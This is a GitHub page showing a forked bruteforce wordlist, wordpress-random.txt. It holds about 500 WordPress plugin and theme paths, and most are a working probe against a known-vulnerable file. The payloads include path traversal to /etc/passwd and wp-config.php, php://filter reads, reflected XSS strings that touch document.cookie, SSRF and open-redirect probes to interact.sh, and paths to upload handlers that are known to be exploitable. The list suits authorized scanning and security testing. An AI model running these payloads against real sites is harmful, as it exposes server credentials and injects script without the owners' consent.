forked from random-robbie/bruteforce-lists
-
Notifications
You must be signed in to change notification settings - Fork 0
/
wordpress-random.txt
494 lines (494 loc) · 42 KB
/
wordpress-random.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
/wp-content/plugins/
/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd
/wp-content/plugins/.git/config
/wp-content/plugins/1-flash-gallery/
/wp-content/plugins/123contactform-for-wordpress/
/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/FlagEm/flagit.php?cID=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php?file=../../../wp-config.php
/wp-content/plugins/about.php
/wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php?input_file=php://filter/resource=/etc/passwd
/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&
/wp-content/plugins/ad-widget/views/modal/?step=../../../../../../../etc/passwd%00
/wp-content/plugins/adaptive-images/adaptive-images-script.php/%3Cimg/src/onerror=alert(document.domain)%3E/?debug=true
/wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php
/wp-content/plugins/admin-font-editor/css.php?size=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\\0
/wp-content/plugins/adminer/adminer.php
/wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php
/wp-content/plugins/advanced-text-widget/advancedtext.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/ait-csv-import-export/admin/upload-handler.php
/wp-content/plugins/ajax-random-post/js.php?interval=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=../../../../../../../../../../etc/passwd
/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E=1
/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/api-bearer-auth/swagger/swagger-config.yaml.php?&server=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/arforms/
/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php
/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php
/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=../../../wp-config.php
/wp-content/plugins/athlon-manage-calameo-publications/thickbox_content.php?attachment_id=id%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%26
/wp-content/plugins/avchat-3/index_popup.php?movie_param=%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&FB_appId=FB_appId%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&
/wp-content/plugins/bbpress/
/wp-content/plugins/blogroll-fun/blogroll.php?k=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/blogtopdf/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd
/wp-content/plugins/boldgrid-backup/cron/restore-info.json
/wp-content/plugins/brandfolder/callback.php?wp_abspath=../../../wp-config.php%00
/wp-content/plugins/brandfolder/callback.php?wp_abspath=https://interact.sh/
/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd
/wp-content/plugins/buddypress-media/app/helper/rtUploadAttachment.php
/wp-content/plugins/bulletproof-security/admin/htaccess/db_backup_log.txt
/wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/passwd%00&action=1&ajax=1
/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd
/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/checklist/images/checklist-icon.php?&fill=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php
/wp-content/plugins/cherry-plugin/admin/import-export/upload.php
/wp-content/plugins/church-admin/display/download.php?key=../../../../../../../etc/passwd
/wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/cloudflare/vendor/phpunit/phpunit/build.xml
/wp-content/plugins/constant-contact-api-old/vendor/constantcontact/constantcontact/test/Json/Auth/get_access_token.json
/wp-content/plugins/constant-contact-forms/vendor/constantcontact/constantcontact/test/Json/Auth/get_access_token.json
/wp-content/plugins/contabileads/integracoes/mautic/api-library/vendor/phpunit/phpunit/build.xml
/wp-content/plugins/contact-form-7/readme.txt
/wp-content/plugins/count-per-day/download.php?n=1&f=/etc/passwd
/wp-content/plugins/custom-tables/iframe.php?s=1&key=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php
/wp-content/plugins/defa-online-image-protector/redirect.php?r=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php
/wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=%3Cscript%3Ealert(document.domain)%3C/script%3E
/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php
/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/dzs-videogallery/admin/upload.php
/wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/build.xml
/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
/wp-content/plugins/dzs-zoomsounds/
/wp-content/plugins/dzs-zoomsounds/savepng.php?location=1877.php
/wp-content/plugins/e-search/tmpl/date_select.php?date-from=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/easy-media-gallery-pro/
/wp-content/plugins/easy-wp-smtp/
/wp-content/plugins/easy-wp-smtp/readme.txt
/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
/wp-content/plugins/elementor/
/wp-content/plugins/elementor/assets/js/frontend.min.js
/wp-content/plugins/elementor/readme.txt
/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/embed-swagger/swagger-iframe.php?url=xss://%22-alert(document.domain)-%22
/wp-content/plugins/enhanced-tooltipglossary/backend/views/admin_importexport.php?itemsnumber=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&msg=imported
/wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php?page=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cb
/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php
/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/finder/index.php?by=type&dir=tv&order=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/flash-album-gallery/facebook.php?i=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/flexible-custom-post-type/edit-post.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/flipbook/php.php
/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/fun.php
/wp-content/plugins/gboutique/library/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd
/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd
/wp-content/plugins/gtranslate/
/wp-content/plugins/gtranslate/url_addon/gtranslate.php?glang=en&gurl=/www.pluginvulnerabilities.com
/wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1&class=%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10
/wp-content/plugins/hd-webplayer/playlist.php
/wp-content/plugins/hdw-tube/mychannel.php?channel=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/hdw-tube/playlist.php?playlist=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/hero-maps-pro/views/dashboard/index.php?v=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/hmapsprem/views/dashboard/index.php?p=/wp-content/plugins/hmapsprem/foo%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/indexisto/assets/js/indexisto-inject.php?indexisto_index=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php?ContactId=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3C%22
/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&
/wp-content/plugins/insert-php/readme.txt
/wp-content/plugins/invit0r/lib/php-ofc-library/php-ofc-library/ofc_upload_image.php?name=testing_test
/wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php?abspath=%2Fetc%2Fpasswd
/wp-content/plugins/iwp-client/
/wp-content/plugins/iwp-client/readme.txt
/wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/build.xml
/wp-content/plugins/jetpack/_inc/genericons/genericons/example.html
/wp-content/plugins/jh-404-logger/readme.txt
/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php
/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&mimetype=text/html;%20charset=utf-8
/wp-content/plugins/knews/wysiwyg/fontpicker/?ff=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/lifterlms/
/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd
/wp-content/plugins/magic-fields/RCCWP_upload_ajax.php
/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
/wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd
/wp-content/plugins/mailpress/mp-includes/action.php
/wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd
/wp-content/plugins/members-list/admin/view/user.php?page=%22%3E%3Cimg%20src%20onerror=alert(document.domain)%20x
/wp-content/plugins/mm-plugin/inc/vendors/vendor/phpunit/phpunit/build.xml
/wp-content/plugins/movies/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&
/wp-content/plugins/mstore-api/
/wp-content/plugins/music-store/ms-core/ms-submit.php
/wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd
/wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/new-year-firework/firework/index.php?text=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/nextgen-gallery/nggallery.php?test-head=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/page-layout-builder/includes/layout-settings.php?layout_settings_id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/parsi-font/css.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/phastpress/phast.php?service=scripts&src=https%3A%2F%2Finteract.sh
/wp-content/plugins/photoxhibit/common/inc/pages/build.php?gid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/podcast-channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&
/wp-content/plugins/pondol-formmail/pages/admin-mail-info.php?itemid=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php
/wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en
/wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd
/wp-content/plugins/press/wp-class.php
/wp-content/plugins/prh-api/vendor/phpunit/phpunit/build.xml
/wp-content/plugins/profile-builder/assets/misc/fallback-page.php?site_url=javascript:alert(document.domain);&message=Not+Found&site_name=404
/wp-content/plugins/qards/
/wp-content/plugins/quiz-master-next/README.md
/wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php
/wp-content/plugins/raygun4wp/sendtesterror.php?backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/realia/libraries/PayPal-PHP-SDK/vendor/phpunit/phpunit/build.xml
/wp-content/plugins/redirection/
/wp-content/plugins/s3-video/views/video-management/preview_video.php?media=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C%22
/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd
/wp-content/plugins/securimage-wp/siwp_test.php/%22/%3E%3Cscript%3Ealert(1);%3C/script%3E?tested=1
/wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php
/wp-content/plugins/seo-watcher/ofc/php-ofc-library/ofc_upload_image.php?name=testing_test
/wp-content/plugins/sfwd-lms/
/wp-content/plugins/shortcode-ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e
/wp-content/plugins/simpel-reserveren/edit.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/simple-ads-manager/sam-ajax-admin.php
/wp-content/plugins/simple-ajax-chat/sac-export.csv
/wp-content/plugins/simple-fields/simple_fields.php?wp_abspath=/etc/passwd%00
/wp-content/plugins/simple-file-list/ee-file-engine.php
/wp-content/plugins/simple-file-list/ee-upload-engine.php
/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php
/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd
/wp-content/plugins/skysa-official/skysa.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php
/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/socialfit/popup.php?service=googleplus&msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/sourceafrica/js/window.php?wpbase=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/stageshow/stageshow_redirect.php?url=http%3A%2F%2Finteract.sh
/wp-content/plugins/super-forms/
/wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E
/wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E
/wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=../../../../../etc/passwd
/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php
/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(1)%3C%2Fscript%3E
/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=/etc/passwd
/wp-content/plugins/ultimate-member/
/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/upspy/index.php
/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php?error=&error_description=%3Csvg/onload=alert(1)%3E
/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=tout
/wp-content/plugins/w3-total-cache/pub/minify.php?file=yygpKbDS1y9Ky9TLSy0uLi3Wyy9KB3NLKkqUM4CyxUDpxKzECr30_Pz0nNTEgsxiveT8XAA.css
/wp-content/plugins/w3-total-cache/pub/sns.php
/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php?input_file=php://filter/resource=/etc/passwd
/wp-content/plugins/webp-converter-for-media/includes/passthru.php?src=https://interact.sh
/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd
/wp-content/plugins/whizz/plugins/delete-plugin.php?plugin=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/woocommerce-software-license-manager/vendor/phpunit/phpunit/build.xml
/wp-content/plugins/woocommerce/
/wp-content/plugins/woopra/inc/php-ofc-library/php-ofc-library/ofc_upload_image.php?name=testing_test
/wp-content/plugins/wordfence/lib/diffResult.php?file=%27%3E%22%3Csvg%2Fonload=confirm%28%27test%27%29%3E
/wp-content/plugins/wordfence/lib/wordfenceClass.php?file=/../../../../../../etc/passwd
/wp-content/plugins/wordpress-popup/views/admin/
/wp-content/plugins/wp-classic/wp-classic/wp-classic.php
/wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/wp-content/plugins/wp-easycart/inc/admin/phpinfo.php
/wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd
/wp-content/plugins/wp-file-manager/lib/php/connector.minimal
/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php
/wp-content/plugins/wp-file-manager/readme.txt
/wp-content/plugins/wp-hide-security-enhancer/router/file-process.php?action=style-clean&file_path=/wp-config.php
/wp-content/plugins/wp-json-api-disable/wwdv.php
/wp-content/plugins/wp-mail-smtp-pro/
/wp-content/plugins/wp-mail-smtp/
/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php?mes=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E
/wp-content/plugins/wp-payeezy-pay/donate.php
/wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php
/wp-content/plugins/wp-ses/readme.txt
/wp-content/plugins/wp-slimstat-ex/lib/ofc/php-ofc-library/ofc_upload_image.php?name=testing_test
/wp-content/plugins/wp-source-control/downloadfiles/download.php?path=../../../../wp-config.php
/wp-content/plugins/wp-statistics/readme.txt
/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress
/wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php?form=%3C/script%3E%3Cimg%20src%20onerror=alert(document.domain)%3E&control=upload
/wp-content/plugins/wpforms-lite/vendor/symfony/css-selector/Node/load.php
/wp-content/plugins/wpify-woo/deps/dragonbe/vies/examples/async_processing/queue.php/%22%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E
/wp-content/plugins/wpmudev-updates/keys/
/wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php
/wp-content/plugins/wpsml-sys.php?a=1
/wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php?page=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/wpstorecart/php/upload.php
/wp-content/plugins/wsecure/wsecure-config.php
/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd
/wp-content/themes/
/wp-content/themes/.git/config
/wp-content/themes/Anthology/functions/upload-handler.php
/wp-content/themes/Attitude/go.php?https://interact.sh/
/wp-content/themes/Coldfusion/includes/uploadify/upload_settings2_image.php
/wp-content/themes/DailyDeal/monetize/upload/upload.php
/wp-content/themes/Ghost/includes/uploadify/upload_Settings2_image.php
/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php
/wp-content/themes/Grimag/go.php?https://interact.sh
/wp-content/themes/MoneyTheme/uploads/upload.php
/wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php
/wp-content/themes/Nuance/functions/jwpanel/scripts/valums_uploader/php.php
/wp-content/themes/RightNow/includes/uploadify/upload_background_image.php
/wp-content/themes/TheFox/footer.php
/wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php
/wp-content/themes/about.php
/wp-content/themes/agritourismo-theme/functions/upload-handler.php
/wp-content/themes/altair/functions/
/wp-content/themes/altair/images/
/wp-content/themes/altair/images/flip/
/wp-content/themes/altair/modules/
/wp-content/themes/ambience/thumb.php?src=%3Cbody%20onload%3Dalert(1)%3E.jpg
/wp-content/themes/amplus/functions/upload-handler.php
/wp-content/themes/basic/themify/themify-ajax.php?upload=1
/wp-content/themes/betheme/muffin-options/fields/upload/field_upload.php
/wp-content/themes/bordeaux-theme/functions/upload-handler.php
/wp-content/themes/bulteno-theme/functions/upload-handler.php
/wp-content/themes/cameleon/includes/fileuploader/upload_handler.php
/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php
/wp-content/themes/clockstone/theme/functions/uploadbg.php
/wp-content/themes/condominium/functions/admin_options/template-upload.php
/wp-content/themes/condominium/functions/comments.php
/wp-content/themes/cubed_v1.2/functions/upload-handler.php
/wp-content/themes/dance-studio/core/libs/imperavi/tests/file_upload.php
/wp-content/themes/dandelion/functions/upload-handler.php
/wp-content/themes/diarise/download.php?calendar=file:///etc/passwd
/wp-content/themes/dr-seleznev/images/konsult/consult-4.jpg
/wp-content/themes/dr-seleznev/images/opit/img_3.jpg
/wp-content/themes/dr-seleznev/images/perelom-sheiki-bedra-doktora2.jpg
/wp-content/themes/eatery/nav.php?-Menu-=https://interact.sh/
/wp-content/themes/elemin/themify/themify-ajax.php?upload=1
/wp-content/themes/enfold-child/update_script/vendor/phpunit/phpunit/build.xml
/wp-content/themes/evolve/js/back-end/libraries/fileuploader/upload_handler.php
/wp-content/themes/folo/themify/themify-ajax.php?upload=1
/wp-content/themes/fun.php
/wp-content/themes/funki/themify/themify-ajax.php?upload=1
/wp-content/themes/grido/themify/themify-ajax.php?upload=1
/wp-content/themes/haberadam/api/mobile-info.php?id=
/wp-content/themes/highlight/lib/utils/upload-handler.php
/wp-content/themes/ithemes2/themify/themify-ajax.php?upload=1
/wp-content/themes/kiddo/app/assets/js/uploadify/uploadify.php
/wp-content/themes/koblenz/languages/load.php
/wp-content/themes/konzept/includes/uploadify/upload.php
